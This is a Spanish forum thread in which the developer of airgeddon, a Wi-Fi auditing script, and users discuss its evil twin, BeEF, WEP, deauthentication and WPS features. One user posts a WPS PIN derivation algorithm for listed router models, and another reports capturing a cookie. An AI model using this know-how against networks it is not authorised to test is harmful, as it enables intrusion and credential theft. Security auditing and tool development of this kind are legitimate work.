
4. Debido al problema del punto 1, no puedes ejecutar beef desde cualquier sitio y pasarle parámetros como un "-c tuConfigPersonalizada", ya que si no, le pasas parametros al script de bash que no le llegan al verdadero ejecutable de beef. Por lo que para poderlo lanzar con una config solo tenemos la opción de saber exactamente donde está beef instalado.

5. Por lo explicado en el punto anterior, si tú tienes un beef instalado a mano en la ruta que a ti te ha dado la gana, airgeddon no puede saber donde lo tienes, así que hice una historia para que te lo pregunte y lo puedas meter a mano y se valide y demás...

Bueno, pues eso... un montón de movidas... además de bugs que he descubierto de beef con tanta prueba y que he reportado, etc etc...

También le he metido "polimorfismo" al script. Por lo explicado en el punto 5, para que cada vez que arrancas airgeddon, si tienes beef instalado en una ubicación desconocida, no tengas que estar metiendo la ruta donde está, hice que airgeddon se modifique a si mismo para guardar dicha ruta y hacer cambios persistentes. Además estos cambios son resistentes a updates y a mover el script de un sistema a otro donde luego ya no está beef. Se que desde un punto de vista purista de programación esto no es muy buena idea, pero es muy práctico... y yo soy un alienígena práctico. Bueno, si usais un sistema en el que ya venga BeEF (como Wifislax x64) no tendréis ningún problema.

En fin, que no lloro más. Solo decir que ha sido la integración más difícil que hay en airgeddon hasta ahora. Espero que haya merecido la pena y que la disfruteis.

Saludos terrícolas!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: juandiegomu en 02-02-2017, 19:41 (Jueves)
muy buen trabajo,pedazo curro te as pegado,un saludo
Título: Re: Script multiuso en bash, airgeddon
Publicado por: sanson en 02-02-2017, 19:46 (Jueves)
hola


bueno, pues habra que probarlo, que aun no lo hice.


saludos
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 02-02-2017, 22:14 (Jueves)
gracias  >:(

tengo problemas con la 6.0


del primer menu ,eligo poner en mode monitor ...y despues opcion 4 ..escanear ..pues no sale nada de nada..solo que pulse ctrl-C cuando quiera parar el escaneo , pero no hay ventana de escaneo.


mmmmmmmmm , lo he vuelto a lanzar y me ha escaneado , pero al elegir evil twin con ssl y bettercap ..nada, otra vez  se ha quedao en coma.

Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 05-02-2017, 23:30 (Domingo)
q raro... te sigue pasando? porq yo estoy probando en varios linux (Wifislax, Kali, Suse, BlackArch) y no me pasan cosas raras... de hecho, del tema del escaneo no ha cambiado nada en esta versión. ¿le pasa a alguien más? USUARIONUEVO, ¿como puedo reproducirlo exactamente? versión de wifislax y pasos exactos para ver si puedo ver si hay un problema.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 05-02-2017, 23:54 (Domingo)
no he vuelto a probar, los pasos ..sencillo , ir eligiendo las opciones del menu ...no se que orden ,ya probare otra vez..pero vamos, conforme salen menus elegir de las opciones que daba.


Creo  te has dejado algo interesante fuera del script , y es la captura de credenciales , denro de nuestra red , es decir sin montar un ap falso ni nada de eso.

Tu estas en tu casa en tu wifi , y alguien se cuela ..y quieres saber quien es...  por ejemplo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: sanson en 06-02-2017, 09:16 (Lunes)
hola

precisamente el otro día estuve probando la 64 y eche de menos cookies moster, al hilo de lo que comenta usuarionuevo

saludos
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 08-02-2017, 20:39 (Miércoles)
Pues no soy capaz de reproducirlo  ??? he intentado "de tó".

Bueno, alguien ya ha "beefeado" un poco? algún feedback? bueno, cuando ya entras al panel de control y sale el cliente hooked ahí termina hasta donde llega airgeddon claro... pero aunque beef es un poco experimiental y hay muchos comandos que no funcionan, es muy divertido! los que sí van, están muy curiosos. Imagino que dependerá de mil factores (navegadores, versiones, etc).

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: cisc0 en 08-02-2017, 22:47 (Miércoles)
funciona de maravilla la nueva version ahora con el beef...
el trafico anda mas fluido y obtuve captura una cookie  ;)
pero despues de un buen rato beefeando jaja se le va la onda.. pero creo que es mi adaptador

gracias! v1s1t0r  >:(

saludos
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 09-02-2017, 01:50 (Jueves)
hola

precisamente el otro día estuve probando la 64 y eche de menos cookies moster, al hilo de lo que comenta usuarionuevo

saludos

no compilaba , pero ... ya lo he conseguido compilar  ;)

ya no desvio mas.

sobre lo que comente ya no me ha pasado mas , aunque tampoco es que sepa usarlo mucho el tema beef.  ;)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-04-2017, 00:16 (Martes)
Hola gente, hacía tiempo que no escribía por aquí. Bueno, pues me he currado un wiki de airgeddon. el readme era ya muy grande. ahora está todo bien distribuido y segmentado. Básicamente es lo mismo que había en el readme pero bien montado. Echad un ojillo:

https://github.com/v1s1t0r1sh3r3/airgeddon/wiki (https://github.com/v1s1t0r1sh3r3/airgeddon/wiki)

También pasé a master la v6.12 que corregía alguna chorrada.

Sigo currando en la 6.2 y en la 7.0.

Estoy con la 6.2 creando un dockerfile de docker.  He montado un tinglado bastante guapo entre dockerhub-dockercloud y github. ahora con cada push a github se auto-construye una imagen de docker que se sube automaticamente a dockerhub-dockercloud. Además lleva el tag dependiendo del branch:

branch docker -> tag alpha
branch dev -> tag beta
branch master -> tag latest

De momento solo está construida la alpha ya que ando de pruebas con ello. Estoy teniendo unos problemillas con el hostapd dentro del contenedor de docker... pero bueno, q estoy investigando... q no he tenido mucho tiempo para indagar. Si veo que necesito ayuda con eso ya os lo diré. Me mola mucho docker la verdad, pero reconozco que es un poco infernal ponerlo en marcha si el contenedor es complicado (como el de airgeddon). Dejo un link por aquí al dockerhub de airgeddon: https://hub.docker.com/r/v1s1t0r1sh3r3/airgeddon/ (https://hub.docker.com/r/v1s1t0r1sh3r3/airgeddon/), se agradecen estrellitas los que seais fans de docker.

En la v7.0 estoy poniendo ataques WEP al script... looooool sí, habéis leido bien... WEP . ya se que eso está ya más pasao q la capa de drácula... pero me hacía ilu que también lo tuviera por aquello de que sea más completito.

Seguiremos informando. Y ya me diréis si el wiki os parece claro y ordenado. La sección de docker también está muy bien explicada creo yo.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 07-05-2017, 19:46 (Domingo)
Buenas, ya está la versión 7.0 de airgeddon con los ataques WEP integrados.

USUARIONUEVO, imagino que habrás notado desde hace algunas versiones, que ahora además del fichero airgeddon.sh , también está el language_strings.sh y el known_pins.db . Son los 3 ficheros que realmente se usan. Lo demás son ficheros de imágenes, readmes y cosas por el estilo que no se utilizan directamente. Lo digo para que lo tengas en cuenta de cara a incluirlo en futuras versiones de Wifislax. Tuve que hacerlo y separarlo porque el script ya era demasiado grande.

También tiene soporte para ser ejecutado en docker desde la 6.2. Dudas, al wiki: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki (https://github.com/v1s1t0r1sh3r3/airgeddon/wiki) aunque también podéis preguntar por aquí o por mail o en irc en #airgeddon en irc.freenode.net

Bueno lo dicho, a disfrutarlo.

Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 07-05-2017, 20:07 (Domingo)
gracias por aclararme lo de los ficheros ..pues ni me habia dado cuenta , por que el script se actualiza..y no veo que ha bajado mas cosas  ;D
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 08-06-2017, 23:09 (Jueves)
Sip USUARIONUEVO... no se si andarás preparando otra iso (fijo q sí xq tú no paras xdd), para que lo tengas en cuenta.

Está publicada la 7.1 ya de airgeddon... si miráis el changelog veréis muchos pequeños cambios q lo hacen más "user friendly". Con el cambio de reaver de la 1.5.2 a la 1.5.3 se lió parda porque la opción -a dejó de rular... en wifislax no afectó ya que tenéis una 1.5.4 custom que soporta el -a sin problemas. Al final he acabado quitando el -a y funciona igual de bien y ya sin conflictos en ninguna versión.

Citar
### 7.1
 - Added default choice for some yes/no question. Regexp improved
 - Tested compatibility with Backbox 4.7 and Parrot 3.6
 - Improved curl and wget methods. Now autodetect if http proxy is set and needed
 - WPS Reaver attacks modified. Removed --auto (-a) argument causing problems on some Reaver versions
 - Dockerfile updated

De igual forma te comento otro cambio grande que hay (no en airgeddon esta vez, en hashcat). Estoy ya desarrollando la 7.11 en la que estoy arreglando todo el lío que ha habido con hashcat. Ya sabíamos que desde el salto de la versión 2 a la 3 de hashcat cambiaba todo... línea de comandos, textos de salida, etc... pero es q ahora desde la 3.40 hay otra liada... ya no sirven los ficheros hccap , ahora son hccapx y para hacer la transformación hay que utilizar una herramienta que se llama cap2hccapx y que viene en el paquete hashcat-utils.

En la 7.11 que estoy terminando ya está todo controlado... la 2.00 a su manera y en la 3.x hasta la 3.30 de una forma y con la 3.40 y 3.50 manejado de otra manera y validando también que tengas el cap2hccapx, etc etc... de hecho, eso está terminado ya, ahora ando con otras cosillas que quiero sacar en la misma versión.

Te lo comento aunque no se si ibas a mantener hashcat en la distro, me comentabas que ocupaba mucho y tal... bueno, lo que decidas. A mi me gusta mucho la verdad.

Bueno, y ya a modo de spam, os comentaré que si alguno se aburre mucho y anda por Madrid, podemos vernos en el Hack&Beers del día 23 de Junio ya que me han invitado para hacer una pequeña demo de airgeddon allí, así le ponéis cara al marciano.. Para el que no lo sepa, es un evento de charlas de seguridad informática variadas. Es gratuito aunque hay que reservar la entrada porque se peta. https://www.eventbrite.es/e/entradas-hack-beers-vol-9-madrid-35168375558 (https://www.eventbrite.es/e/entradas-hack-beers-vol-9-madrid-35168375558)

Saludos terrícolas!
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 08-06-2017, 23:34 (Jueves)
hashcat viene en la iso , por que ya no meten los firmwares graficos, y ocupa solo 2 megas.
ademas lleva las hashcat-utils con cap2hccapx

Eso estara en la proxima, y esta ya en alguna de las isos que he dejado de testeo.

Llevare hashcat 3.5.0

lo de reaver y argumentos que no rulan , en su dia acabe un poco cansado, por que reportas y no se parchea,por eso wifislax, lleva una version custom , con todo arreglado.  ;D

Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 09-06-2017, 23:09 (Viernes)
actualizo para informarte , hashcat estara en /usr/bin/hashcat , version 3.6.0 y hashcat-utils 1.8 todas tambien en /usr/bin

 ;)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 10-06-2017, 12:51 (Sábado)
pregunta del millon

¿el script crea carpetas y demas al trabajar o hace todo con pipes?

lo digo por que me esta dando problemas tenerlo en /opt

le hago un simbolico a /usr/bin , pero no de el script languajes y el de know_pins , y si lo lanzo desde shell , dice que no estan los lenguajes  ;D

desde el menu no pasa por que lleva en el desktop que la ruta de trabajo es en /opt

entonces o bien empaqueto los tres scripts en /usr/bin o enlazo los tres desde /opt hacia bin

creo que se entiende lo que digo , y estoy mas por simbolicos en bin apuntando a opt de todo , asi los scripts reales en opt que generen alli lo que necesiten.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 10-06-2017, 15:34 (Sábado)
Solo hace falta q los tres ficheros estén en la misma carpeta: airgeddon.sh , language_strings.sh y known_pins.db.  Los demas ficheros no hace falta q estén.

Montatelo como veas  ;D

Y lo suyo es q se pueda invocar desde cualquier sitio con el comando "airgeddon".
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 10-06-2017, 16:44 (Sábado)
Solo hace falta q los tres ficheros estén en la misma carpeta: airgeddon.sh , language_strings.sh y known_pins.db.  Los demas ficheros no hace falta q estén.

Montatelo como veas  ;D

Y lo suyo es q se pueda inbocar desde cualquier sitio con el comando "airgeddon".

hice simbólicos de los tres en opt hacia /usr/bin   ya no falla y se puede ejecutar bien desde consola.  ;)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 10-06-2017, 20:06 (Sábado)
Perfect! Eso como tu veas. Ya sabes q la otra opción es hacer un script de dos lineas en /usr/bin/airgeddon q haga cd /opt/airgeddon && bash airgeddon.sh

Pero se ejecuta con "airgeddon" y no con "airgeddon.sh" no? Yeahhh
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 10-06-2017, 20:22 (Sábado)
el script se llama airgeddon.sh , asi que se ejecuta con airgeddon.sh  ;D
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 10-06-2017, 22:34 (Sábado)
Yo era por estandarizar como en otras distros, q se ejecuta como airgeddon a secas, para q sea siempre igual y no volver loco al personal, pero como veas. Si funciona, q es lo importante... Ok  >:(
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 10-09-2017, 19:25 (Domingo)
Hola gente, la versión 7.21 está a puntito de salir del horno. Pequeños bug fixes y traducción al italiano incluida. Ahora ya es obligatorio lanzarlo como root o sudo, pero en Wifislax eso no afecta ya que se es root así que no problem.

USUARIONUEVO, esta versión tendrá otro fichero más que borrarse y que no es útil en la ejecución. Es el fichero .editorconfig , lo digo por si cuando hagas el update lo quieres borrar o simplemente no incluirlo. A medida que el proyecto crece se va llenando de "carroña", jejeje. Voy a asegurarme de que va perfecto con la última version de Wifislax (64-1.1). Si no me equivoco todo irá ok pues ya estaba controlado todo el tema de hashcat, dependiendo de la versión se hace de forma distinta la movida. Voy a chequear todo.

Animo a la gente a que me manden más pines de WPS que sepáis que son válidos. Gracias y saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 13-09-2017, 03:00 (Miércoles)
ejecuto el script  (7.11) , me dice que hay version mas nueva y la baja ...

7.2 

what =?

Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-09-2017, 07:15 (Miércoles)
Si, eso es normal. Siempre fue así. Las versiones en airgeddon fueron

7.01
7.02
7.1
7.11
7.2
7.21

Igual en vez de 7.2 debería ser 7.20 ... aunque a estas alturas ya cambiarlo... le echaré un ojo, creo que sin tocar nada tal y como lo tengo montado solo tendría q ponerle el nombre nuevo y listo... y funcionaría tal cual está.

No obstante, como decía, la 7.2 es la actual de master. la 7.21 va a pasar en muy breve, aún estoy terminando alguna chorrada de traducciones.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 13-09-2017, 12:10 (Miércoles)
lo digo por que el que tiene 7.11 y ve actualizacion a 7.2 , parece un downgrade.

te recomiendo

1.0.0
1.0.1
1.0.2
1.1.0
1.1.1
1.1.2


y asi y el primer numero solo para cambios gordos...al final 0 ,1,2 se agotan y subes el segundo...hasta 9 siquieres y pasas el primero a uno mas alto ..o yo que se..pero actualmente conlleva a confusion.


Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 13-09-2017, 13:51 (Miércoles)
Ya, si lo tengo claro... no obstante, hasta ahora no tenía problemas porque era airgeddon el que se actualizaba con sigo mismo contra el github y ya está, y en la propia programación de airgeddon está manejado correctamente con la forma de versionar que hay.

El problema es que ahora airgeddon también aparece en algunas distros con la opción de auto_update deshabilitada ya que al estar en un repositorio se prefiere que la actualización sea por el repositorio. Como por ejemplo los repositorios de Parrot donde ya ha ocurrido que después de la 7.11 pasó a la 7.2 y fue considerado downgrade. No pasó nada porque rápidamente los de Parrot lo vieron y lo arreglaron, pero el resumen es que sí, que haría falta cambiar la forma de versionar.

Yo para no urgar mucho (de hecho creo que no tendría que tocar nada en programación), creo que sería tan fácil como que las versiones que hasta ahora tenían solo un decimal, pasen a tener dos añadiendo un cero detrás y listo. Es decir:

7.11
7.2 <- esta pasaría a ser 7.20
7.21

Con este cambio chorras ya no habría problema y además no tengo que tocar absolutamente nada. Ya funcionaría en los updates propios de airgeddon contra el github y también para cuando esté por ahí en algún repositorio. Lo tengo que probar bien para estar 100% seguro pero seguramente será lo que haga porque es lo más sencillo y le sirve a todo el mundo.

Es cierto que esa forma de versionar que indicas sería más correcta y ojalá hubiera tomado esa decisión al princpio... pero la verdad, cuando comencé a programar airgeddon que fue en plan "práctica de programación de bash" ni me habría planteado en la vida que pudiera llegar a ser ni la mitad de grande de lo que es hoy... es lo que tiene no haber tenido la idea de expandirlo/publicarlo desde el minuto cero. Pero bueno, por suerte como decía, el cambio es mínimo con esta forma que indico y suficiente.

Gracias y saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 18-09-2017, 00:50 (Lunes)
Ale, la 7.21 released.  ;D

Mandadme pines malditos! q estoy yo recopilando nuevos... miraré también el algoritmo arcadyan a ver como va para ver si lo enchufo por ahí también q podría estar curioso. Tengo entendido q las redes Orange actuales caen del tirón con eso ahora...
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 23-09-2017, 18:21 (Sábado)
Hola USUARIONUEVO. He visto que la versión de bettercap del wifislax 64-1.1 es la 1.6.0 . Para el proximo wifislax puedes actualizarla a la 1.6.2? lo digo porq hace tiempo encontré un bug en bettercap que reporté. Han tardado mucho pero al fin lo arreglaron, y está arreglado en la 1.6.2 . Dejo el link del bug y también del commit donde una vez arreglado se aprovecha en airgeddon para la próxima versión 7.22:

https://github.com/evilsocket/bettercap/issues/356
https://github.com/v1s1t0r1sh3r3/airgeddon/commit/3c6786e0824b199ddadfa88c561fe2dda8dfe560

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: USUARIONUEVO en 23-09-2017, 20:54 (Sábado)
Hola USUARIONUEVO. He visto que la versión de bettercap del wifislax 64-1.1 es la 1.6.0 . Para el proximo wifislax puedes actualizarla a la 1.6.2? lo digo porq hace tiempo encontré un bug en bettercap que reporté. Han tardado mucho pero al fin lo arreglaron, y está arreglado en la 1.6.2 . Dejo el link del bug y también del commit donde una vez arreglado se aprovecha en airgeddon para la próxima versión 7.22:

https://github.com/evilsocket/bettercap/issues/356
https://github.com/v1s1t0r1sh3r3/airgeddon/commit/3c6786e0824b199ddadfa88c561fe2dda8dfe560

Saludos.

si , de hecho ..ya tengo la 1.6.2 hace algun tiempo ...  actualizarla desde un updater puede ser complicado por eso no se actualiza como otros paquetes, de hecho , la version 1.6.2 me pidio alguna gema nueva , para funciones añadiddas.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 04-10-2017, 10:38 (Miércoles)
Estimado v1s1t0r ¿Cómo puedo aumentar el tiempo para los apretones de manos en la operación número 9?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-10-2017, 10:49 (Miércoles)
La operación número 9? de qué submenú?

Si te refieres a la captura de un handshake, el tiempo es el que tú quieras esperar mientras la ventana de captura esté abierta. Y respecto al tiempo del ataque DoS, no tiene mucho sentido alargarlo. Si un dispositivo no se ha caído con 10 o 15 segundos de lanzarle paquetes de desautenticación, no creo que lo haga aunque estés un minuto lanzándoselos.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 04-10-2017, 12:14 (Miércoles)
Submenú número 7 (Evil Twin attacks menu). Sí, me gustaría aumentar el tiempo de ataque de DoS mientras captura el apretón de manos. Por lo menos hasta 30 segundos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 04-10-2017, 15:54 (Miércoles)
Yo creo que no tiene mucho sentido. Si un dispositivo no se ha caído en 20 segundos, no lo va a hacer en 30.

No obstante, puedes modificar tú mismo el código y cambiar el timeout. Lo tienes en las líneas 6891, 6897 y 6902. Son las variables que se llaman "sleeptimeattack" y que valen 12, 12 y 16 segundos respectivamente para los ataques DoS de mdk3, aireplay y wds confusion. Al de wds confusion le puse 16 segundos en lugar de 12 como a los demás porque tarda un poquito más en comenzar.

Como te decía, modfiicando el valor de la variable sleeptimeattack puedes hacer que el DoS dure lo que tú quieras... pero de verdad que no tiene mucho sentido en mi opinión, aunque puedes probarlo si quieres.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 05-10-2017, 07:03 (Jueves)
Muchas gracias. Esto no es sólo para propósitos prácticos, sino también para fines de estudio. Ya lo he arreglado. Todavía hay 7239, 7251, 7262.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 05-10-2017, 08:10 (Jueves)
Otra pregunta: Airgeddon utiliza un generador de PIN o simplemente una base de datos?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 05-10-2017, 08:37 (Jueves)
Ambas cosas. Utiliza base de datos de pin propia y también genera pin con varios algoritmos. Hasta ahora los que se han implementado son el algoritmo ComputePIN, el EasyBox y ahora en la inminente version 7.22 que ya se piede probar en la rama dev de github también el algoritmo Arcadyan.

Me consta que hay más. Se irán incorporando poco a poco. Alguna sugerencia de alguien que sepa de algún algoritmo en especial que merezca la pena?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 05-10-2017, 09:58 (Jueves)
https://forum.antichat.ru/threads/ujazvimost-v-protokole-wi-fi-protected-setup.310835/page-171#post-3978417
Asus
BSSID = 60:A4:4C:84:25:38
b1 + b2 + b3 + b4 + b5 = 0xA4 + 0x4C + 0x84 + 0x25 + 0x38 = 0x1D1 (= 465)
p0 = (0x60 + 0x38) mod (10 - (0 + 465) mod 7) = 152 mod (10 - 3) = 152 mod 7 = 5
p1 = (0xA4 + 0x38) mod (10 - (1 + 465) mod 7) = 220 mod 6 = 4
p2 = (0x4C + 0x38) mod (10 - (2 + 465) mod 7) = 132 mod 5 = 2
p3 = (0x84 + 0x38) mod (10 - (3 + 465) mod 7) = 188 mod 4 = 0
p4 = (0x25 + 0x38) mod (10 - (4 + 465) mod 7) = 93 mod 10 = 3
p5 = (0x38 + 0x38) mod (10 - (5 + 465) mod 7) = 112 mod 9 = 4
p6 = (0x60 + 0x38) mod (10 - (6 + 465) mod 7) = 152 mod 8 = 0
s = wps_checksum(5420340) = 2
WPSPIN = 54203402

Airocon 1.00
Airocon 150Mbps Wireless N ADSL2/2+ Modem Router, firmware: RTK V2.1.1
Airocon ADN-4101, firmware: V1.9
Airocon ADSL Modem, firmware: V2.1.1
Airocon ADSL Modem, firmware: V2.11
Airocon ADSL Router, firmware: GAN9.9W7-4-VO-R6B011-VN.EN
Airocon ADSL Router, firmware: V2.1.2
Airocon AIRDSL A1144, firmware: RTK V2.1.1
Airocon ASUS DSL-N10E, firmware: V2.1.14
Airocon ASUS DSL-N10E, firmware: V2.1.15_EU
Airocon ASUS DSL-N10E, firmware: V2.1.15_TR
Airocon ASUS DSL-N10E, firmware: V2.1.16_APAC
Airocon ASUS DSL-N10E, firmware: V2.1.16_EU
Airocon ASUS DSL-N10E, firmware: V2.1.19_EU
Airocon ASUS DSL-N10E, firmware: V2.1.20_EU
Airocon CNet Wireless-N ADSL Router, firmware: CNet V1.1
Airocon DIR-600
Airocon DIR-612
Airocon D-Link DIR-600M
Airocon DR-820, firmware: Across DR-820 _V1.0
Airocon DR-921, firmware: Across DR-921 _V1.0
Airocon DSL-2730E, firmware: SEA_1.00
Airocon DSL-N10S, firmware: V2.1.16_APAC
Airocon DSL-N10S, firmware: V2.1.17_APAC
Airocon DSL-N12E, firmware: V2.1.15_EU
Airocon DSL-N12E, firmware: V2.1.15_TR
Airocon DSL-N12E, firmware: V2.1.16_APAC
Airocon DSL-N12E, firmware: V2.1.16_EU
Airocon DSL-N12E, firmware: V2.1.17_APAC
Airocon DSL-N12E, firmware: V2.1.19_EU
Airocon DSL-N12E, firmware: V2.1.20_EU
Airocon F9J1004v1/F9J1005v1, firmware: 1.00.02
Airocon F9J1004v2/F9J1005v2, firmware: 1.00.01
Airocon GD-W809N, firmware: Goldweb GD-W809N _V1.0
Airocon GD-W810N/ND, firmware: GOLDWEB_V1.0
Airocon GD-W810ND, firmware: Goldweb GD-W810ND _V1.0
Airocon GD-W910ND, firmware: Goldweb GD-W910ND _V1.0
Airocon IP-WDL-RT150-P4, firmware: V02.01 Build.131031 Rel.0643670
Airocon IP-WDL-RT150-P4, firmware: V02.02 Build.140304 Rel.0651388
Airocon IP-WDL-RT150-P4, firmware: V02.02 Build.140721 Rel.0637816
Airocon IP-WDL-RT1T1R-B, firmware: V02.01 Build.131101 Rel.0653054
Airocon IP-WDL-RT2T2R, firmware: V02.02 Build.140728 Rel.0655111
Airocon JCG, firmware: JWS-N530R
Airocon LEO-150N-AD, firmware: LEO-150N-AD_V1.0.0.1_18082014
Airocon LKW150-21A2, firmware: V2.1.2
Airocon LKW300-21A3, firmware: V2.1.2
Airocon MC-AWR11, firmware: MODECOM_V1.0
Airocon Netis Modem Router, firmware: RTK V2.1.1
Airocon Realtek Wireless Router, firmware: RTK V2.1.1
Airocon Realtek Wireless Router, firmware: RTK V2.2.2
Airocon RTA04N, firmware: RTA04N_GVT_009
Airocon RTL8671 ADSL Modem, firmware: V01.10 Build.120329 Rel.0656648
Airocon RTL867x ADSL Modem
Airocon RTL867x ADSL Modem, firmware: BL V2.1.1
Airocon RTL867x ADSL Modem, firmware: RTK V2.1.1
Airocon RTL867x ADSL Modem, firmware: SEA_1.00
Airocon RTL867x ADSL Modem, firmware: SEA_1.01
Airocon RTL867x ADSL Modem, firmware: V01.11 Build.130424 Rel.0653855
Airocon RTL867x ADSL Modem, firmware: V01.11 Build.131217 Rel.0648017
Airocon RTL867x ADSL Modem, firmware: V01.12 Build.140115 Rel.0638469
Airocon RTL867x ADSL Modem, firmware: V02.00 Build.121109 Rel.0653605
Airocon RTL867x ADSL Modem, firmware: V02.01 Build.130218 Rel.0658357
Airocon SWARAJ, firmware: SW200 V2.1.1
Airocon SWARAJ, firmware: SW200 V2.1.2
Airocon TD854W, firmware: V01.09 Build.111122 Rel.0657362
Airocon TD854W, firmware: V01.11 Build.131227 Rel.0660914_TTNET
Airocon TEW-719BRM, firmware: V1.02.B10
Airocon Virtual Web Router
Airocon WL-P-D408, firmware: V2.1.2
Airocon ZE-W810ND, firmware: ZENET ZE-W810ND _V1.0
Airocon ZW444, firmware: ZW444_V1.0
Airocon ZW888, firmware: ZW888_V1.0
Airocon ZW919, firmware: ZW919_V1.0
ASUS DSL-N10_C1 ADSL
ASUS DSL-N10-C1 ADSL
ASUS DSL-N12E_C1 ADSL
ASUS DSL-N12E-C1 ADSL
ASUS DSL-N12U_C1 ADSL
ASUS DSL-N12U-C1 ADSL
ASUS DSL-N14U ADSL
ASUS RT-AC1200, firmware: 2.0
ASUS RT-AC1200G+, firmware: 2.0
ASUS RT-AC51U Black
ASUS RT-AC51U, firmware: 2.0
ASUS RT-G32
ASUS RT-G32
ASUS RT-G32 Rev.C1
ASUS RT-N10
ASUS RT-N10
ASUS RT-N10 Rev.B1
ASUS RT-N10 Rev.C1
ASUS RT-N10+
ASUS RT-N10E
ASUS RT-N10LX
ASUS RT-N10P Black
ASUS RT-N10P, firmware: 2.0
ASUS RT-N10PV2 Black
ASUS RT-N10U
ASUS RT-N10U Black
ASUS RT-N11
ASUS RT-N11P
ASUS RT-N11P Black
ASUS RT-N11P, firmware: 2.0
ASUS RT-N12
ASUS RT-N12 Black
ASUS RT-N12 Rev.C1 Black
ASUS RT-N12 Rev.D1 Black
ASUS RT-N12+ Black
ASUS RT-N12+, firmware: 2.0
ASUS RT-N12D1, firmware: 2.0
ASUS RT-N12E
ASUS RT-N12E_B1, firmware: 2.0
ASUS RT-N12HP_B1, firmware: 2.0
ASUS RT-N12LX
ASUS RT-N12VP
ASUS RT-N12VP Black
ASUS RT-N12VP, firmware: 2.0
D-Link DIR-615
Virtual Web 0.9 (proxy server)
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 05-10-2017, 10:57 (Jueves)
http://rgho.st/private/6zhZRdbf6/4a15e859115c44ac407f39f8a1c542f0
Título: Re: Script multiuso en bash, airgeddon
Publicado por: doctortrapi en 05-10-2017, 13:03 (Jueves)
https://www ...wifi-libre..com/topic-869-todo-sobre-al-algoritmo-wps-livebox-arcadyan-orange-xxxx.html
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 05-10-2017, 15:20 (Jueves)
Gracias por las sugerencias. @doctortrapi, ese algoritmo ya está implementado como comentaba antes.

Saludos.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 06-10-2017, 07:56 (Viernes)
https://www ...wifi-libre..com/topic-869-todo-sobre-al-algoritmo-wps-livebox-arcadyan-orange-xxxx.html
v1s1t0r hay tres algoritmos en mi opinión. Livebox, Arcadyan y naranja-XXXX o no he entendido algo?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: Nesight1957 en 06-10-2017, 12:09 (Viernes)
Si el punto de acceso salta de canal a canal, active la conmutación de canal.
-c [canal, canal, canal, ...]
Activar la conmutación de canales. Si no se especifican canales, mdk3 saltará por todos los canales 14 b / g. El canal cambiará cada 5 segundos.
Menú 7/9
¿Se puede hacer un elemento en el script para cambiar el canal?
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 06-10-2017, 23:35 (Viernes)
No entiendo bien lo que pides... tú cuando seleccionas un objetivo ya tienes un canal seleccionado (el del objetivo). Si quieres cambiar el canal, cambia el objetivo.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: drvalium en 07-10-2017, 02:05 (Sábado)
Creo que es por que hay routers que con cada intento cambian de canal.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: v1s1t0r en 07-10-2017, 02:07 (Sábado)
Bueno, pero eso tendría más sentido en la parte de DoS. Si quieres tumbar un AP y lo reinician y se cambia de canal, pues lo entiendo... pero si estás capturando un handshake, lanzas el DoS durante unos segundos, tiras al cliente y capturas el handshake, si el AP cambia de canal seguramente tengas que volver a seleccionarlo como objetivo si quieres lanzarle cualquier otro ataque, no obstante, ya has capturado el handshake.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: drvalium en 07-10-2017, 03:25 (Sábado)
Me suena que con Wifimosys sucedía algo similar.
Título: Re: Script multiuso en bash, airgeddon
Publicado por: koala633 en 07-10-2017, 06:08 (Sábado)
Citar
Creo que es por que hay routers que con cada intento cambian de canal.

